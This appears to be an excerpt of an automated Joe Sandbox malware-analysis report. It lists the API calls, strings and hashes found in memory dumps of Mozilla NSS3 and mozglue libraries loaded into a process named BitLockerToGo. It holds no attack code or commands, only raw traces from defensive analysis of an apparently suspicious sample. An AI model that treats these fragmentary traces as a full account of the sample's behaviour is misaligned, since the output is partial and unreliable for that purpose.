                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3332421221-0
                                                                                                                                                      • Opcode ID: 8f7c19fc7ed2009efc96b8c8be540d205742e64d37b9773285b320a4672445c7
                                                                                                                                                      • Instruction ID: d3a893ca1fb643a06ea0fa08400a0f8b3d80b9ec1c1866ac06d97d8e599c83c8
                                                                                                                                                      • Opcode Fuzzy Hash: 8f7c19fc7ed2009efc96b8c8be540d205742e64d37b9773285b320a4672445c7
                                                                                                                                                      • Instruction Fuzzy Hash: A5210A76A04216A7EF056F25DC0EA9B3B78EB6234DF044134ED1892B11F732D96AC6B1
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C89B999), ref: 6C89CFF3
                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C89B999), ref: 6C89D02B
                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C89B999), ref: 6C89D041
                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C89B999), ref: 6C9E972B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                      • API String ID: 491875419-598938438
                                                                                                                                                      • Opcode ID: 7673f239a79608083ac232c3afbe77a7281a5ebb7a901bef9475dab5a697d7c8
                                                                                                                                                      • Instruction ID: 8976caadc8cf035b9d32e1795f007ce713374d2fcd4a56174965a6deb4a127f4
                                                                                                                                                      • Opcode Fuzzy Hash: 7673f239a79608083ac232c3afbe77a7281a5ebb7a901bef9475dab5a697d7c8
                                                                                                                                                      • Instruction Fuzzy Hash: B6612671A042209FD3208F2DC840BA6B7F5EF55318F6886ADE4499BB42E377D947C7A1
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C95CD08
                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C95CE16
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C95D079
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1351604052-0
                                                                                                                                                      • Opcode ID: 6de6311a579f46de05a6e335d77280263014ee410bc74b767d1f31bd4140fb9d
                                                                                                                                                      • Instruction ID: ac293403935b42aad31ccf1ac4dd2c22d212e8b8223ec2ee4e07b6781262a498
                                                                                                                                                      • Opcode Fuzzy Hash: 6de6311a579f46de05a6e335d77280263014ee410bc74b767d1f31bd4140fb9d
                                                                                                                                                      • Instruction Fuzzy Hash: 48C17FB5A002199BDB10DF24CC80BDAB7B8BF58318F5441A8E94CA7741E775EEA5CF90
                                                                                                                                                      APIs
                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C848273), ref: 6C849D65
                                                                                                                                                      • free.MOZGLUE(6C848273,?), ref: 6C849D7C
                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C849D92
                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C849E0F
                                                                                                                                                      • free.MOZGLUE(6C84946B,?,?), ref: 6C849E24
                                                                                                                                                      • free.MOZGLUE(?,?,?), ref: 6C849E3A
                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C849EC8
                                                                                                                                                      • free.MOZGLUE(6C84946B,?,?,?), ref: 6C849EDF
                                                                                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6C849EF5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                      • Opcode ID: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
                                                                                                                                                      • Instruction ID: 10824e066cacae98cca4415f3281c30d66be9a483d6d33f71c551ec4f8d30fbd
                                                                                                                                                      • Opcode Fuzzy Hash: a1260c633bea4c0d1dbb884e7fb64d2e4c960c991dfc50227bd25e31b24b17ed
                                                                                                                                                      • Instruction Fuzzy Hash: AB7190B0909B458BD722CF18C64095BF7F4FF99315B449A29E85A5BB01EB30E8C5CB81
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(D7D7AACF), ref: 6C912C5D
                                                                                                                                                        • Part of subcall function 6C970D30: calloc.MOZGLUE ref: 6C970D50
                                                                                                                                                        • Part of subcall function 6C970D30: TlsGetValue.KERNEL32 ref: 6C970D6D
                                                                                                                                                      • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C912C8D
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C912CE0
                                                                                                                                                        • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                        • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                        • Part of subcall function 6C912E00: TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                        • Part of subcall function 6C912E00: EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                        • Part of subcall function 6C912E00: PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                        • Part of subcall function 6C912E00: PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                        • Part of subcall function 6C912E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                        • Part of subcall function 6C912E00: PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C912D23
                                                                                                                                                      • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C912D30
                                                                                                                                                      • CERT_MakeCANickname.NSS3(00000001), ref: 6C912D3F
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C912D73
                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C912DB8
                                                                                                                                                      • free.MOZGLUE ref: 6C912DC8
                                                                                                                                                        • Part of subcall function 6C913E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C913EC2
                                                                                                                                                        • Part of subcall function 6C913E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C913ED6
                                                                                                                                                        • Part of subcall function 6C913E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C913EEE
                                                                                                                                                        • Part of subcall function 6C913E60: PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C913F02
                                                                                                                                                        • Part of subcall function 6C913E60: PL_FreeArenaPool.NSS3 ref: 6C913F14
                                                                                                                                                        • Part of subcall function 6C913E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C913F27
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3941837925-0
                                                                                                                                                      • Opcode ID: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                      • Instruction ID: 548fd1353db6b1ce2c53b5492ca9ef6042a47c869e22a28080b685b04bdbd353
                                                                                                                                                      • Opcode Fuzzy Hash: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                      • Instruction Fuzzy Hash: 9F5103756187199BEB00EF25CC46B5B77E9EFA5308F15042CEC5583A50E731E815CB92
                                                                                                                                                      APIs
                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C84DDCF
                                                                                                                                                        • Part of subcall function 6C82FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C82FA4B
                                                                                                                                                        • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                        • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE0D
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C84DE41
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE5F
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEA3
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEE9
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF32
                                                                                                                                                        • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DB86
                                                                                                                                                        • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DC0E
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF65
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C84DF80
                                                                                                                                                        • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                        • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                        • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 112305417-0
                                                                                                                                                      • Opcode ID: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                      • Instruction ID: 65c5d158e8a329585fe3c6985b64cf423522e8eb08aaf3224941f696d5739ea3
                                                                                                                                                      • Opcode Fuzzy Hash: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                      • Instruction Fuzzy Hash: FB51D9726017199BD7318B18CA846AEB3B2BF91308F958D2ED41A53F01D731F859CBD2
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7F31A7), ref: 6C82CDDD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                      • API String ID: 4275171209-2186867486
                                                                                                                                                      • Opcode ID: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                      • Instruction ID: 8c31b2e199f2514a380b30eb06fd54b1a8761329cc082a4e8c3145be9c9b6a03
                                                                                                                                                      • Opcode Fuzzy Hash: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                      • Instruction Fuzzy Hash: 0131E8317402155BFB30AEA5CE4DBBE7776AB41758F204825F514AB781E7B4D440C7E1
                                                                                                                                                      APIs
                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C97536F,00000022,?,?,00000000,?), ref: 6C974E70
                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C974F28
                                                                                                                                                      • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C974F8E
                                                                                                                                                      • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C974FAE
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C974FC8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                      • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                      • API String ID: 2709355791-2032576422
                                                                                                                                                      • Opcode ID: 06b68da89e5c9bc641eae43ee4d298f4f31e5ef7b32fb206196150e96848f41c
                                                                                                                                                      • Instruction ID: 746d9f6984fd44f3f0d3c038e1961e1c84a58dddbca67e564749843dccf2812f
                                                                                                                                                      • Opcode Fuzzy Hash: 06b68da89e5c9bc641eae43ee4d298f4f31e5ef7b32fb206196150e96848f41c
                                                                                                                                                      • Instruction Fuzzy Hash: 56513B31A071458BEB21CA6E88507FF7BF9AF46318F188125E894A7A43D335C9558FF1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                        • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6C7FED50
                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FEDAC
                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C7FEDCC
                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C7FEE08
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C7FEE27
                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7FEE32
                                                                                                                                                        • Part of subcall function 6C7FEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C7FEBB5
                                                                                                                                                        • Part of subcall function 6C7FEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C82D7F3), ref: 6C7FEBC3
                                                                                                                                                        • Part of subcall function 6C7FEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C82D7F3), ref: 6C7FEBD6
                                                                                                                                                      Strings
                                                                                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C7FEDC1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                      • API String ID: 1980384892-344433685
                                                                                                                                                      • Opcode ID: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                      • Instruction ID: c0c9fd5bce23105c16e954ae967b9da540c35ebcf17d9a01a590f1f0a98e862b
                                                                                                                                                      • Opcode Fuzzy Hash: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                      • Instruction Fuzzy Hash: 6051F471D053088FEB10DF68DA896EEB7B5AF49318F04883DE86167B40E7306949C7E2
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,?,6C93124D,00000001), ref: 6C928D19
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C93124D,00000001), ref: 6C928D32
                                                                                                                                                      • PL_ArenaRelease.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D73
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928DBA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                      • String ID: KRAM$KRAM
                                                                                                                                                      • API String ID: 2419422920-169145855
                                                                                                                                                      • Opcode ID: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                      • Instruction ID: 38aedb47cde83a346c67db1be5bd393e97f4494c9c13d24cc567ba5ef7809047
                                                                                                                                                      • Opcode Fuzzy Hash: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                      • Instruction Fuzzy Hash: 0C2191B6A147018FCB08EF38C48456AB7F4FF55308F15896AD9C887709D738D846CB95
                                                                                                                                                      APIs
                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CA20EE6
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CA20EFA
                                                                                                                                                        • Part of subcall function 6C90AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C90AF0E
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F16
                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F1C
                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F25
                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                      • API String ID: 2948422844-1374795319
                                                                                                                                                      • Opcode ID: 533b854510614b815c8c31c7afcd793e703d070563f37560cebce20b4612e8cc
